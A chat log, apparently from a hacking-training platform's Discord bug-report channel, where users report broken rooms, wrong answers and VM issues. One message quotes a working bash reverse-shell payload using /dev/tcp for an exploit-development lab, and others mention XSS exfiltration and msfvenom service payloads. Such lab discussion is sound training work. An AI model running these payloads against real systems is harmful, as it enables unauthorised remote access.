#room-bugs

1 messages Β· Page 14 of 1

eternal summit
#

@flint plover please don't use that word here, it's a slur

wooden atlas
#

Room: 25 days of Chris. Task 23, Day 18. I can't login to the hacker forum after I did some wrong xss scripting. Can anyone please fix it. Thanks.

lyric vessel
#

in the room lfibasics

#

the last user in that file is THM

#

but that isnt accepted as answer

wheat fractal
lyric vessel
#

No, the hint says its the last user in the file, that has to be the right answer

#

Its a straight up tutorial, nothing to do wrong here

#

lmao nevermind

wheat fractal
#

Course/room: Learn Linux

Task number: 30 [Section 5: Advanced File Operations] ln

Question: How Would I link /home/test/testfile to /tmp/test

I answered (by mistake): ln /home/test/testfile -s /tmp/test

The questions was correct.

But isn't the right answer just: ln /home/test/testfile /temp/test?

#

with a space in between, of course ^

rustic stump
#

Refresh the page and check again @wheat fractal

#

That might be the answer tolerance

wheat fractal
#

oh, I can see that the answer is corrected now!

weak fox
#

In the basic room ..rpmetasploit, i noticed a problem that may be platform wide. it's not a huge deal, but then again ...

#

not sure how its matching .. since supplied answer may be contained in the real answer but it is not the answer itself

weak fox
#

it also appears to be a case insensitive match (very important for some things) password123 != PASSWORD123

acoustic fjord
#

The answers work with some tolerance which can mess up the answers indeed

#

It's especially visible with rooms like tmux remux

astral phoenix
#

there is a wrong answer in malresearching room
in task 3 que no 3
the answer is SHA-384 but its SHA-512

wheat fractal
#

Hey guys, the hint for Day 17 in the room Advent of Cyber is (really) wrong. It says: If you've tried more than 30 passwords from RockYou.txt, you are doing something wrong! The password needed is in line 905679 in rockyou.txt NotLikeThis

#

In the linked rockyou file in the description its on line 905678.. So thats not correct eiter.

topaz thorn
#

That task has an issue you have to use the standalone Hydra room

wheat fractal
#

Thanks. I went through SSH and read the flag that way tipsfedora

hushed olive
#

trying this lab

#

got stuck at what is the username of a logged on user?

#

i trided bruteforcing using dirsearch gobuster

#

but the username didnt came in the result

#

anyone?

thorn bronze
#

@carmine jetty ??

#

Wrong place I suppose?

carmine jetty
#

not at all

thorn bronze
#

It's a bug?

obsidian kiln
#

@carmine jetty that looks suspiciously like a scam. Please clarify.

carmine jetty
#

I just want to know about it

#

can you explain

obsidian kiln
#

You want to know about the random HTML page you uploaded?...

#

With an out of date PayPal "Confirm your account", and a nice big Hyperlink?

carmine jetty
#

no, that's why I upload it, can you explainno, that's why I upload it, can you explain

obsidian kiln
#

Looks like a scam. Don't click the link, and ignore it.

carmine jetty
#

6 hours ago I got that message in the email

obsidian kiln
#

Definitely a scam, given it wants you to have completed it 14 months ago.

#

Delete, and move on.

carmine jetty
#

means it's a scam link? I just found out that it was written there I had to fill in my credit card data

obsidian kiln
#

Also, that is definitely not a room bug, so A) please don't post suspicious stuff without asking first, and B) definitely don't post it in #room-bugs πŸ˜†

#

Yes, it's a scam

carmine jetty
#

all right thanks bro

#

I get a lot of emails like that

#

starting from paypal, amazon to bank accounts

onyx wyvern
#

Hello, does anyone else have troubles with the "Revenge" room? I can't reach the web page

eternal summit
#

That's still brand new so I'd appreciate if you could wait. It will have been tested.

onyx wyvern
#

Okay πŸ™‚ thanks @eternal summit

finite bolt
#

I got root on Jeff but the room is not taking the user flag
I am getting the Uh-oh! Your answer is incorrect.
100% sure the answer is correct
anybody getting this error message also?

#

never mind ... i figured it out

ripe kraken
#

Missunderstood #21 and found the old URL for cummunity πŸ™‚

#

But should maybe be updated..

#

#31 that is!

eternal summit
#

It's on the list

outer fossil
#

There's a problem on Intro to x86-64 in Task 4

hazy tiger
#

...

#

Would you like to explain @outer fossil

violet hedge
#

In the task 3, the UDP server does not respond to my "hello" msg.

#

I'm following all instructions given, and its byte encoded.

hazy tiger
#

Screenshot

#

?

#

Can you also post it in #room-help and ping me please

violet hedge
north crescent
#

Hello, I am unable to access the content on the VM in the burp suite room. Has anyone else had an issue where the connection just times out? (intercept is off/ tried with and without burpsuite running)
https://tryhackme.com/room/rpburpsuite

high mantle
#

Not necessarily a bug but the admin password in task 6 of the post-exploitation room doesn't match the one that's shown in task 2. Might want to edit that one before people get confused. https://tryhackme.com/room/postexploit

twin tapir
#

Aw shit I’ve been meaning to fix that

#

reeee

#

I blame skidy

twilit forge
#

working through blaster and the very first question asks for how many ports are open and this is not consistent with my scan results from nmap

#

the answer is supposedly a single digit when I have twice returned more open ports than what was accepted for an answer.

faint ridge
#

@twilit forge it's not an issue with the room. It's an issue with windows

icy elbow
#

https://tryhackme.com/room/csp Task 5 suggests using beeceptor to exfiltrate data via XSS. This is somewhat misleading for the Sandbox challenges afterwards (Task 7) as the administrator bot cannot reach outside the THM network.

#

A pointer for the user to use an attack-machine http server (a simple python server will do), instead of beeceptor, for the challenges should fix that issue

wheat fractal
twin tapir
#

@next bluff

median pollen
#

Hi I want to report that im founding more open ports than the correct answer in Blaster

faint ridge
#

Known issue, that's windows boxes in General. @median pollen

#

You'll have to guess the answer by process of elimination

median pollen
#

You'll have to guess the answer by process of elimination
@faint ridge Ok thank you will do that

real berry
obsidian kiln
#

@dusky junco ^^ πŸ™‚

dusky junco
#

Thanks (: will get to this when I get to a PC after work

icy elbow
#

Anyways thanks to the new external IPs on the CSP room, the bug I reported is now fixed, and also a bunch of other attack challenge problems as well. Good stuff πŸ™‚

#

thanks

ornate wigeon
#

Room Corp. The network setting seems incorrect. And since this is a room for Appblocker. I can not go in and adjust the network settings.

#

The room task asked to download a powershell script from github

twin tapir
#

rooms never have internet access, I’ve asked the creator before to change it as it’s misleading within the room. You have to download it on your personal machine and host it on your vm

ornate wigeon
#

i see

#

thanks alot!

obsidian kiln
#

That's post exploitation basics, task 5

#

Could probably do with an update 😁

faint ridge
ornate wigeon
#

sheeessh

twin tapir
#

@obsidian kiln shhhhh I was never here

rustic stump
#

You need to be more specific than that

viral cobalt
#

me thinks you may be doing something wrong

compact meadow
#

Calling Dark sir darkchamp

azure valve
#

Anyone have their Kali's firefox not connecting to Jacks .thm local domain? I connect to the IP, just not the tld

viral cobalt
#

you need to add it to your /etc/hosts file

#

format is:
ip hostname.tld

azure valve
#

got it, thx

#

I remember that before....

#

I think I also remember doing the exact same thing before too.. lol going through the about:config like crazy man

#

Thanks mate

topaz mural
#

Hello, since 2 days I am not able to go in any room : TryHackMe print infinite "loading" ....anybody got an idea I can resolve it ?

topaz mural
#

I hope I am in the right channel guys πŸ™‚

flint estuary
#

Cannot transfer files(only image files) via FTP in room: agent_sudo.

random spoke
#

Hello

#

I've just found a little issue in the room "Geolocating images". Task6 image 3, the image is reversed. In reality if you look at the scene from this location, you'll see that the eiffel tower is on the left and the Montparnasse Tower on the right. you can check on the map here : https://upload.wikimedia.org/wikipedia/commons/thumb/e/e2/Meudon_map.svg/1920px-Meudon_map.svg.png
That's why at the beginning I was searching from the other side of Paris. This is not totally an error because some webcam inverse the images but I think it's worth mentionning

compact meadow
#

I think that's @green steppe's room? πŸ€”

green steppe
#

oh wow

#

thats a....

#

strange..... bug

patent trellis
random spoke
#

bug very cool room

#

i never imagined using yandex for reverse search

ruby swift
vocal zinc
#

Refresh

#

It’ll be fixed

#

Like magic

teal barn
halcyon zenith
#

Running python pret.py and targeting the box IP address. Nothing comes up and shuts down the connection

#

Checked my openvpn, and its connected

hazy tiger
#

You can’t run PRET on that room

#

It even says

#

It won’t work

eternal summit
#

Steel Mountain:
To minimise issues, the msfvenom payload you generate should be exe-service otherwise you will get 1053 errors when starting the service.

proper yew
#

Say what now?

eternal summit
#

Mayor, we've been over this before.

#

It makes it a hell of a lot smoother, and works better.

#

It makes a lot more sense to generate a service payload if you're using it as a service.

#

My current theory is that staged payloads work because it spawns a new process or whatever before windows kills it, but why let windows kill it? Prevent the error.

gleaming mason
#

owasptop10> task 26 > q2. I didn't change my usertype to admin and still i am able to access the flag.

obsidian kiln
#

@wheat fractal your room is borked

upper viper
#

@obsidian kiln Is it broken for you too? I seems to only break if you submit the correct solution which should give you the flag (((i think))))

wheat fractal
#

No

#

It's not borked necessarily @obsidian kiln

#

@upper viper depending on how you encode your token, it won't be decoded properly

#

And will bork the machine

eternal summit
#

Para

#

That sounds like you should have written more resilient software

wheat fractal
#

I thought I wrote a note on tha5

upper viper
#

@eternal summit LOL @wheat fractal thank you very much. I just base64 encoded like in the previous challenge, shrug

wheat fractal
#

I mean,

#

You say resilient software

#

I say that you should take into account misconfigurations unintentionally created by the developer

#

@upper viper it's something that could come up in the real world and you need to be prepared for that

upper viper
#

@wheat fractal Affirmative, cheers πŸ˜†

wheat fractal
#

😁

glad badger
#

You call it a bug, Microsoft calls it an undocumented bonus feature.

faint ridge
#

it's a feature

inner lantern
high palm
#

i have issue with kenobi

wheat fractal
#

what issue?

high palm
#

@wheat fractal any issue with command or issue with machine

gleaming mason
#

owasptop10> task 26 > q2. I didn't change my usertype to admin and still i am able to access the flag.
Was this intended in the machine?

obsidian kiln
#

Why am I being pinged? πŸ€”

high palm
#

see

look at this ouptput @wheat fractal @obsidian kiln
@high palm here @obsidian kiln

obsidian kiln
#

Oh, I can see that, but why am I getting pinged about it?..

high palm
#

no one was replying so thought someone help me

obsidian kiln
#

That looks like a Layer 8 error to me. Try asking over the #room-help -- one of the mentors will give you a hand.

high palm
#

ok

#

thanks

wheat fractal
#

Im doing the steel mountain room but the user flag has 2 "?" symbols making it incorrect

#

have you tried the flag without the two symbols?

#

nope

#

it worked

#

lol

#

thanks

#

finished this room a few days ago and there was no problem with any flag πŸ˜‰

#

you're welcome

pale parcel
#

hey. In /room/zthobscurewebvulns Task 12 I was able to use the given JWT to get the flag. There should be the need to change smth in the data so that one can not use the give Token.

pale parcel
#

Doing it the proper way is so much fun πŸ™‚

wheat fractal
#

In Agent-Sudo I got root exploiting ||the membership in lxd group||. Because none of the found CVEs was right I looked into a writeup and found out, that this was not the way intended to get root. Maybe this is a bug?

vocal zinc
#

oh thats funny

#

not a bug, just an unintended

wheat fractal
#

Okay πŸ˜‰

reef garden
#

Im in an intro room and I am i not use it is providing the flag
help?

hazy tiger
small karma
#

Can someone help me out with a thing ?

eternal summit
#

Can I remind you that this channel is for room bugs?

small karma
#

Not sure if its a bug or not ... so where can I speak with someone ?

eternal summit
#

Is it a bug with a tryhackme room?

small karma
#

its probably not a bug so where shoul i ask for help
i basically ran one script and cant figure out why didnt appear one directory when supossly should have

#

(linpeas and linenum)

eternal summit
small karma
#

thanks

azure valve
#

I don't think "Get-DomainUser" is working in Post Exploitation box with PowerView. Nor "Get-DomainGroupMember". But "Get-NetUser" and some others are working. I'm not as familiar with PS yet, so not sure what the problem may be

eternal summit
#

@azure valve Make sure you're in a 64bit powershell

wheat fractal
#

I think the uploadvulns Room has a bug in Task 5 , #1. I entered /ressources, but it's actually /resources.

#

Or is it the typo-prevention thing again?

obsidian flame
#

answer regex strikes again

hazy tiger
#

Answer tolerance it’s on all rooms

wheat fractal
#

Okay. In this case it's misleading me πŸ™‚ Copied the word an still get 404 πŸ˜„

obsidian kiln
#

Refresh the page. It's the answer tolerance.

wheat fractal
#

Refresh the page. It's the answer tolerance.
@obsidian kiln That's a nice possibility to correct such things! Thanks for the hint πŸ™‚

solar spear
#

In the owasp top10 day 8, following the reflected link gives an error. Visit reflected from the home page seems to work

quasi swan
#

question 4 task 5 for new room Physical Security Intro is misleading i think

cobalt juniper
#

Not really a bug just a misspelling in one of the rooms. Introtox8664 in Task 2 right before it shows the command e asm.syntax=att it says β€œThe run” when I think it meant to say β€œThen run”

pale kiln
#

I found a bug in the room Agent Sudo. One of the questions asks for a password for the SSH service - Task 3, Question 5. The answer is not the same as the actual password that is used to login using the SSH username and password

twin tapir
#

probably just answer tolerance

gray sonnet
twin tapir
#

Yeah I need to change it I think skidy made a password change when he went in to fix activation

gray sonnet
#

okay : D

nimble pewter
#

Hello! Is there any way to report a question inside a room to be reviewed by the maker?

obsidian flame
#

just ask your question here, the person will pick it up

#

say what is wrong with the room, link the room, and a screenshot as most of the times a picture speaks 100 words @nimble pewter

#

Thanks for your understanding!

nimble pewter
#

In the room Sublist3r (rpsublist3r) in Task 4 Question #3 the correct answer is "admin". But there is not a subdomain admin.nbc.com

wheat fractal
#

wdym? dig +short admin.nbc.com

#

got 66.77.124.21

azure valve
#

@azure valve Make sure you're in a 64bit powershell
@eternal summit Still acting up for me, I dont know

indigo mountain
#

I just got to the end of the NMAP room in the beginner section. The vulnerability listed in the hint does not show in the result of the scan... I ran nmap --script vuln -ipaddress-

eternal summit
#

That isn't the correct syntax by the looks of it

indigo mountain
#

oh..then my bad..lol

eternal summit
#

Can you post an actual screenshot in #room-help please?

indigo mountain
#

Sorry just closed it, I can go back in and try to redo it.

#

actually it's still up

brisk fox
#

Hello, I have issue on OWASP Top 10 [Day 7] Cross-site Scripting section. When I deploy VM I'm getting error from nodejs(Express.js)

#

I'm tried 2 times. Fyi.

eternal summit
#

Go to /

#

Then follow the link to reflected

brisk fox
#

Omg. Okey. Thx

clear rain
#

For the marketplace room I was able to make the web server crash and restart.

#

and had to do the attack again

viscid yew
#

Is it possible that the deployed machine isn't configured as it supposed to be? I am working on a Simple CTF room and it's showing incorrect answer error to the right answer?

wheat fractal
#

Can you, please, give Blaster more resources? I can't launch gobuster without the website crashing.

rustic stump
#

Check your connection

#

!vpnscript

tropic flameBOT
north linden
cosmic rock
eternal summit
#

Deskel changed their hosting, the writeups still exist I believe

tepid yoke
#

Can someone please help me with sort of bugs, i just subscribed, got some basic linux know-how, using the Browser Kali machine.

Room: Vulnversity
NMAP Question 2: If i scan my machine it says 5 ports are open, in the Video it shows a 6. Port open a 3333 running Apache. Well no Apache at my machine. (Is the Browser based Kali machine bugged or am i supposed to search for open ports inside the Video?)
Question 3: I don' even have a squid proxy on my Browser Kali machine?
Question 7: Well everyonone knows web server running on 3333, but same problem, no webserver running on my Browser Kali machine?
Task 3 Gobuster: Can't do this task without active Apache Server, so i can't find the directory that has an upload form page?

hazy tiger
#

Have you terminated and redeployed the machine?

eternal summit
#

You need to deploy the target VM in the room @tepid yoke

#

Your attacking machine and the target ate different

tepid yoke
#

uff my bad, thanks!

proper jasper
#

has 'undiscovered' been tweaked since it was on vulnhub? im running the same stuff and so far it has seemed the same... ||but i cant get the authorized_keys working, even though i write it to the location...|| think it may be a bug...

hazy tiger
#

what?

#

You didn't specify a room πŸ˜„ unless I'm blind

proper jasper
#

You didn't specify a room πŸ˜„ unless I'm blind
@hazy tiger undiscovered. i remember it from vulnhub and even went back to my writeup. this is the path, but i cant ||ssh in with the key||. ive made sure all permissions are correct and everything too...

hazy tiger
proper jasper
#

oh... it was released yesterday. maybe it has been taken down

hazy tiger
#

Yes it has πŸ˜„

proper jasper
#

oh ok

icy elbow
#

Not reaaaaally a bug, but https://tryhackme.com/room/introexploitdevelopment Task 4 exploit section is confusing and misunderstands python execution on the attacker vs victim machine, and goes on a bit of a wild experimentation when all you need really is || payload = "bash -c 'exec bash -i &>/dev/tcp/"+lhost+"/+"+lport+" <&1'"||

obsidian kiln
#

Did wonder about that when I glanced through it earlier...

icy elbow
#

yeah, there's also some missunderstandings about URL encoding vs base64 encoding...

obsidian kiln
#

I've been asked to run through that room for a uni workshop on Thursday, so I'll have a look beforehand and tweak my stuff as necessary, then possibly send it to the creator πŸ™‚

icy elbow
#

πŸ‘ rock on (I finished it but it defo could use some cleanup)

maiden sorrel
#

@icy elbow @obsidian kiln thanks for the feedback. as I mentioned in the room im new to exploit development and was not aware there was an easier solution. im more than happy to rewrite the payload with your suggestion, i simply used the first thing I found that worked. also, if you're willing to explain the misunderstanding between URL vs base64 encoding im happy to correct that as well. it may read like a writeup because I adapted it from a writeup I kept. i made the room in an attempt to educate those similar to my skill level. i was conscious of the fact that i needed to change the language to better represent a walkthrough, it was not my intention to give a convoluted explanation but to show the process of trial and error. im happy to correct those areas as well. I appreciate the feedback.

maiden sorrel
#

@icy elbow i updated the room using your suggestion. lmk the inaccuracies regarding URL vs base64 encoding and ill fix those as well πŸ‘πŸ½

icy elbow
#

Let me give it a look and see how I can help cd, defo appreciate you making the room don't take me wrong. It talks about some very interesting topics. Also, I may be wrong here about the encoding but let's see if I can explain myself.

#

Let's see, in task 3 you describe payload.encoded as being necessarily encoded in base64 (while sometimes this may be true, in our case this is not necessarily so) We can see with payload.encoded that instead of merely testing if the website is vulnerable, we are sending data (the shell) over a network back to our attacking machine. In order for data to be properly transmited, it needs to be encoded with base64.

#

which then led you to do this when creating your payload

#

and there it does make some sense since you're trying to send a ton of characters which might break the payload when sending it through a URI (even though it does not break here - see the example ahead), and base64 encoding can be a really good way to avoid those problems (specially if you use something like urlsafe_b64)

#

However for a simpler reverse shell payload, you might not need any encoding at all - like the one I shared - or simple URLencoding could sufice to resolve the problem

#

But my original comment was, admitedly, a bit off the mark because I did not use your socket solution. So I apologize for that.

#

but even in your socket solution, a payload:

#

would work without having to be encoded (url or otherwise, though it still works when URLencoded) - just tested it on my own script just now πŸ™‚
So, as we can see the base64 encoding requirement was somewhat added by making a few assumptions over what payload.encoded meant in the msf module.

#

because it's passed to the command line as is in the cgi vulnerability

#

And yeah, we're all learning. Hopefully this helps clear up a few ideas. Good job on contributing a room (a pretty good idea of a room too). I have yet to do that. So thanks, and also thanks for adressing some of my concerns πŸ™‚

#

Finally, I suspect that many of the https://gtfobins.github.io/ reverse shell payloads would have worked which is always a good reference if you want to include it btw. πŸ‘ thx for reading @maiden sorrel

obsidian kiln
#

Or PayloadsAllTheThings, for that matter

jade thunder
#

going to the site for the deployed xxs playground in the owasp top 10 room gives me this

eternal summit
#

Go to /

#

Then follow the link

jade thunder
#

thx

maiden sorrel
#

@icy elbow that was really insightful thank you. I did make a false assumption about what payload.encoded was doing and i see now it was just insurance. I've added those changes to the room I really appreciate you pointing these things out.

wheat fractal
#

Task 22 Day 17 Advent of Cyber has the wrong password.

#

Please fix this!

eternal summit
#

It's been reported several times and I've personally pushed for it to be fixed as it just needs the VM swapped with another THM upload. This hasn't happened yet.

wheat fractal
#

SO ANNOYING!

wooden forum
#

Heya - /room/rpnmap's question #14 shows there to be a space in the answer, but the doco has it as an = sign, not a space.

eternal summit
#

If you refresh, does it change?

wooden forum
#

i already answered with a space...

eternal summit
#

That doesn't answer my question. If you refresh the THM page, does it change?

wooden forum
#

let me rephrase then. I already answered with a space, so I cannot see what the prompt is for the correct answer. it accepted my answer with a space in.

#

refreshing did not change anything on that question, visibly, for me

eternal summit
#

let me rephrase then. I already answered with a space, so I cannot see what the prompt is for the correct answer. it accepted my answer with a space in.
@wooden forum When you refresh, whatever you answered is replaced with the "correct" answer.

#

Are you 100% sure that a space is not also correct?

wooden forum
#

aha, i see what you're saying.

#

refreshing still had it as a space. and no, i am not 100% sure of that. however, i am 100% sure that the answer as-is from the doco, was not accepted by the THM page. πŸ™‚

eternal summit
#

Unfortunately you can't specify multiple answers to be accepted

wooden forum
#

right.

#

fair enough

turbid valley
#

hi, tryhackme team. right now am playing with Cross-site Scripting room (https://tryhackme.com/room/xss) so am stuck in Task 8 question 3 and 4. i submit the right payload and I get the alert message "Hello" and still don't get the flag !!! for the payload am evasion the filter using Unicode character .. any idea

#

and i don't know if it's right to write the payload here or not

twin tapir
#

What the heck is WackoPicko

#

@turbid valley basically that room has a crap ton of problems and it’s being remade, I would just wait till it’s remade

turbid valley
#

@turbid valley basically that room has a crap ton of problems and it’s being remade, I would just wait till it’s remade
@twin tapir ah no mention of that in room. thank you.

topaz thorn
#

?

turbid valley
#

what happen with this room

faint ridge
#

@turbid valley As Cry said, it is being remade. Wait until it's done

turbid valley
#

thank u I just started it.. they should mention that room had some issues it's better for every memeber ..

twin tapir
#

OWASP Juice Shop - Questions do not do a good job of explaining that you need to submit the flag for each question specifically Task #7. This is commonly a problem in the help chats. cc: @warped talon

lethal dagger
#

Room SQL Injection Unit 7 - task 3. The answer is not ||splitraining||?

wheat fractal
#

Hey. Are there any known bugs with the Dumping Router Firmware room? I have around 5 questions with "Your answer is incorrect". I'm following the writeup and the so called incorrect answers should work.

next bluff
#

Room SQL Injection Unit 7 - task 3. The answer is not ||splitraining||?
@lethal dagger you have a typo there

lethal dagger
#

Thank you!snorlax

wheat fractal
#

I am doing Day 21 of Advent of Cyber, first question. The binary has the value ||4|| moving into var_ch but that it isn't the right answer. The correct answer is ||1||. I'm a little confused, also, because there is no variable coming up as local_ch in the binary in Radare. Please help!

#

Don't worry I was looking at the wrong binary.

barren rune
hazy tiger
obsidian kiln
#

tut tut tut

#

Has Dark let his TLS expire? kekw

#

No, it just doesn't let you in with https, then redirects

#

How odd

hazy tiger
#

Yup

#

Very odd indeed

eternal summit
#

@obsidian kiln He needs to fix his DNS IIRC, it's www.

woeful vapor
#

If an answer comes back with "Uh oh, undefined", i take it ive got it wrong? Just wondering because others i have got wrong say "incorrect" or something along those lines.

hazy tiger
#

Sometimes anti virus like bitdefender stops you from entering key words

eternal summit
#

Steel Mountain: replacing the binary is not the same as the unquoted service path exploit that the room claims.

#

The room tells you to overwrite the binary, which is not exploiting the unquoted service path.

proper yew
#

For the eight millionth time

eternal summit
#

It is done.

twin tapir
faint ridge
#

User who created is active so hopefully can be fixed

twin tapir
#

@wheat fractal I believe this is yours

faint ridge
#

It is

wheat fractal
#

Hint gives you the information necessary to continue progress

rustic stump
#

Yup, it has been updated since

twin tapir
#

ah didnt see that, amazing

muted igloo
twin tapir
#

use /jr

trim zephyr
#

smal thing not working in the ice room. in task 3 you need to use cvedetails.com but I cant find the correct CVE on that site. I did find it on exploit-db.com

twin tapir
#

nope it’s there

trim zephyr
elder rover
#

This supposed to be like this?

vocal zinc
elder rover
#

? ;-;

next bluff
#

make sure you are doing everything right

#

I did this room and there were no issues

elder rover
#

I am did not tamper with cookies first time and the second time

#

Disc : says i should change User-Type from 'user' to 'admin' to see flag at /admin

#

but its seeable without doing thta 0.o?

#

or maybe i read smthn wrong lemme chk

dusky junco
#

Yeah it’s a bit of an unintentional kekw @elder rover

#

I haven’t been able to update the VM for that task/day

pine mirage
#

In the Mr Robot CTF room the host appears to be down. I have tried waiting ten minutes and restarted the VM multiple times

#

is this an issue for anyone else?

pine mirage
#

How can I tell?

#

was just trying to do an nmap scan

faint ridge
#

Ignore that it's not windowsm

#

@pine mirage what was your input for NMAP

pine mirage
#

just nmap -sV ip

#

but then I used threader3000 and it did a more specific input. hold on ill grab that

faint ridge
#

Because I just nmaped it with no issues

pine mirage
#

ah. strange. my input isnt off right?

faint ridge
#

I put nmap -A -sV ip

pine mirage
#

the other thing is that if I go to the domain in browser it just gives a bad HTTP request

#

as if it wasnt up

faint ridge
#

Are you using your own VM?

pine mirage
#

Yeah I have Kali on a VM

faint ridge
#

Run this

#

!vpnscript

tropic flameBOT
faint ridge
#

Run that see if it fixes the issue

pine mirage
#

Ok ill try that. Thanks. so far my VPN hasnt given me any errors but I will try this

faint ridge
#

Sometimes I won't yet there is

pine mirage
#

no errors there

minor goblet
#

Try giving -Pn flag to nmap.

iron vortex
#

Hey guys, I am struggling with the "Kenobi". In Task 3 I want to mount the /var folder of the attacked machine, but I cannot do this because I am missing /sbin/mount.nfs . I cannot install it via apt because my attacking machine is apprently not connected to the internet. What am I missing here?

dusky junco
#

Hey, gonna remove as it has the flag but that looks right to me @wheat fractal double check how you are copy and pasting it into the answer box

#

Thanks (: mind DM'ing me to double check? πŸ˜„

wheat fractal
#

sure

dusky junco
#

all sorted - API being iffy. Refreshing the page sorted it πŸ‘

eternal summit
#

@obsidian kiln plz

topaz thorn
obsidian kiln
#

Fixed and fixed

eternal summit
#

??

#

terminate, redeploy

drowsy stump
#

one question. i just did the mr robot machine and it only gave me 90 point when everyone has 210, why is that?

topaz thorn
#

Questions that don't require answers use to award points

drowsy stump
#

?

#

oh, you mean used to give points?

topaz thorn
#

yea

drowsy stump
#

oh ok

#

thx

soft ingot
#

Think i have found a bug on the Linux Challenges room, i have detailed it as much as i can in this doc.

hazy tiger
#

Uhhhh

#

File scary

soft ingot
#

i was gonna post it all here but i wanted it as one message cause OCD

#

if you want i can put it all in discord?

soft ingot
#

ah that's neat!

#

btw can you let me know when its sorted so i can get flag4? i refuse to cheat

obsidian kiln
#

I think you might be in as the wrong user

soft ingot
#

but GARRY

obsidian kiln
#

The writeup says Bob

soft ingot
#

wait it doesnt say to change to bob, and i dont have his pword?

#

OH AFPOihjOFGUIHBAO@GN

obsidian kiln
#

Is that not the first question in the room? 😁

soft ingot
obsidian kiln
#

🀣

soft ingot
#

I QUIT
im going to bed

faint ridge
obsidian kiln
#

Night!

#

*Note to self: Find a box that relies on attention to detail and get Iron to do it next week*

soft ingot
#

id fail on the first hurdle

#

i was trying to look at his crontab too at somepoint too actually lmao

#

couldnt do it ofc

obsidian kiln
#

Hehe

soft ingot
#

Ironclad's CV:

  • Lacks attention to detail
  • Great at making BS up
torpid glade
#

I assume this is trivial to fix. If not I don't mean to be annoying with this extremely minor bug report

dusky junco
#

No problem, thanks for letting us know!

#

I’ll dispatch the great @obsidian kiln for this. Any chance you could resolve this? β€œknoww” in Task 8 of /room/networkservices when you get 5 minutes please?

torpid glade
#

No problem, thank you for looking at it :)

obsidian kiln
#

Ah, yep, sure

torpid glade
#

ghostblobgib ❀️

dusky junco
#

Thanks homie :3

vocal zinc
#

@torpid glade just as you are a floating point, I am simply a blob

#

I feel connected

torpid glade
#

We are connected by being very abstract objects. We are brothers now.

vocal zinc
torpid glade
obsidian kiln
#

Sorted @torpid glade πŸ‘
(You sent me to the wrong room @dusky junco 😑)

#

πŸ˜†

dusky junco
#

LMAO!

#

I thought I included 2 at t#he end there kekw

#

Mb Muirl

obsidian kiln
#

πŸ˜†

zealous willow
#

Hi, Im new to THM, How do I know for sure that I joined the room of the activity Im doing? The basic Linux room says access denied when I create the required txt file and try and access it to complete the task. Also, the Metasploit activity doesnt seem to have a room to join. Apologies if its a dumb question πŸ™‚

#

Also, If I want to play around with some basic nmap and metasploit, How do I create a custom instance for me to scan and attack?

#

No worries, posted in the the room help channel πŸ™‚

vapid rune
#

hiii doing the room Blue and i got a different vuln from the nmap scan
what i got was different from the actual answer which i just googled based on the hint
it was an smbv2 vuln not an smbv1

fast bobcat
#

Hi
i think there maybe a bug in the room Wireshark101 (https://tryhackme.com/room/wireshark)
At Task 8 in #3 (What is the timestamp for packet 12, only including month day and year?). There is a day difference between the answer and what wireshark shows me. The month and the year are correct, only the day is different.

twin tapir
#

It’s due to time zones, I’m aware of the issue I just can’t fix it rn

soft ingot
#

keep thinking im dyslexic

#

or should i say dyxlecis

obsidian kiln
#

@twin tapir

#

Go fix 😁

soft ingot
#

Its a good room so far btw, im liking it, so Kudos πŸ™‚

twin tapir
#

sir, have you not heard of the FPT protocol

soft ingot
#

File Pransfer Trotocol?

obsidian kiln
#

It doesn't exist

#

Go fix blobknife

twin tapir
#

Bug Muir to fix em

#

it’s fixed

obsidian kiln
#

Good Cry

soft ingot
#

Now it says PTF ??

#

Joking lmao

obsidian kiln
#

Should see the number of spelling and grammar mistakes in Cry's rooms before they're tested

twin tapir
#

Wait did I really put PTF

#

no, it says FTP

soft ingot
#

Joking lmao
@twin tapir

twin tapir
#

Honestly the thing is it really wouldn’t surprise me if I put PTF

soft ingot
#

its something i'd do too tbh

twin tapir
#

also @obsidian kiln fun fact I don’t think cmn gave me any grammar mistakes...

#

which means gg time to find them all

obsidian kiln
#

Yeah, I saw about 6 in the first few tasksπŸ˜†

azure valve
#

Within HackPark if you don't use metasploit and just search exploitdb for the LPE, the exploit listed which it wants you to use asks you to rename a different file with your exploit than supposed to. Just curious as to what happened there. I thought metsploit pulls from exploitdb anyhow and would have the same instructions for that. Not sure I want to give it all away, but did confuse me for a bit.
Maybe I'm the only one not using metasploit..... 😦 lol

obsidian kiln
#

@azure valve there are two vulnerabilities in that service (on this box) -- one is a pure permissions thing (overwriting the binary itself), the other is a true USP vuln. The exploit probably tells you to use the USP rather than the file overwrite.

#

And MSF pulls from the Rapid7 DB, although I'm not sure how it comes into this πŸ˜†

somber sierra
#

In the OWASP Top 10 room task 20 the machine has been changed no ? Because the XSS stored playground is now a login/register rather than a comment and that didn't display flags

red anvil
#

In Wireshark 101 ( great room for intro to Wireshark, but ) ARP q3 answer must contain spaces which is not shown in answer format - confusing a lot πŸ˜‰

jade swan
#

In the room "brainstorm", the amount of ports for question 2 is incorrect. I scanned it twice on t different machines and even checked the walkthrough to make sure I ain't missing something. The only answer it accepted was ||6||, but it should be ||3||.

hazy tiger
#

If it's a windows room, that's a windows thing

high palm
#

in Advent of Cyber day 13 unable to see google chrome

#

task hint says Figure out what the user last was trying to find out

#

anyone

hazy tiger
#

You don't need google chrome

#

Look at writeups

high palm
#

ok then .exe file is key ?

hazy tiger
#

Look at writeups
@hazy tiger

high palm
#

yep doing that

obsidian kiln
#

The writeups are outdated for day 13, as retro was swapped with blaster

#

Go through blaster (it's guided), for the answers @high palm

high palm
#

ok

obsidian kiln
#

@maiden sorrel Hey -- can I DM?
Forgot one thing from that room πŸ™‚

vocal sparrow
#

Hey guys! I'm doing the room Google Dorking, I'm at the task 3 Enter: Search Engine Optimisation and link in question 3 is broken. Not really a problem as I can "bruteforce" answer but I just wanted to report it

gloomy nova
#

i have a problem with the common linux privesc i have downloaded the LinEnum.sh on the remote machine but when i try to run it it gives me syntax error in line 6

eternal summit
#

Screenshot.

#

Probably not a bug

azure valve
#

And MSF pulls from the Rapid7 DB, although I'm not sure how it comes into this πŸ˜†
@obsidian kiln Yea.... they used exploit-suggester. I was confusing the initial access exploit used exploit-db. It was like 3:30am and should have just read more instead of seeing metasploit and then ignoring the rest. lol My bad mate. The vuln I used though I believe is the same USP, but I also didn't see when it was supposed to run that service. Maybe once a day or never. Thanks for getting back to me

autumn scroll
proper jasper
obsidian kiln
#

@proper jasper I tested it, and haven't heard anything from the creator, so I'm going to assume it's a glitch.
I've added it back in

proper jasper
#

ok thankyou

dusky junco
#

